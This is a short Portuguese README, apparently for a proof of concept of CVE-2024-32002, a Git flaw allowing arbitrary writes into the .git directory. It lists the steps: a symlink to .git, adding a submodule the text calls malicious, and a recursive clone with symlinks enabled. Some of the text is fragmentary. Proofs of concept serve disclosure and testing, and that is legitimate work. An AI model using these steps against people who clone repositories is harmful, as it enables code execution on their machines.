
Um POC para o CVE-2024-32002 demonstrando escrita arbitrária no diretório .git.
Um POC para CVE-2024-32002 demonstrando escrita arbitrária no diretório .git.
Veja cve-2024-32002-submodule-aw para o repositório de submódulo relacionado.
.git..gitmodules que define o submódulo malicioso.Este repositório foi criado no Linux (WSL2, para ser específico). Isso é importante, o repositório malicioso só pode ser criado em um sistema de arquivos sensível a maiúsculas/minúsculas.
ln -s .git submodule
Notas:
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists
Notas:
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git